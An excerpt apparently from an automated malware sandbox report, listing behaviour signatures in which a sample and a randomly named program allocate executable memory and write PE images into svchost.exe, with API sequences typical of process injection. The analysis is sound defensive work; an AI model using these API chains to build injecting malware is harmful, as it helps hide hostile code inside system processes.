Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_01304CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 25_2_015B4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 27_2_00B04CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 29_2_012C4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 31_2_01134CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 33_2_01314CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D02000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EA5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: C35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1000000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1001000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1002000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1055000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1280000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1281000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1282000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 12D5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1530000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1531000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1532000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1585000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A40000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A41000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A95000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1200000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1201000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1202000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1255000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 10B0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 10B1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 10B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1105000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1290000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1291000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1292000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 12E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6F5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: ED0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: ED1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: ED2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F25000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B70000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B71000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BC5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 590000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 591000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 592000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 5E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1630000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1631000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1632000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1685000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A60000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A61000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AB5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 925000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1040000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1041000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1042000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1095000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CC0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CC1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D15000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AF5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1110000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1111000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1112000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1165000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FB0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FB1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FB2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1005000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1220000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1221000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1222000Jump to behavior
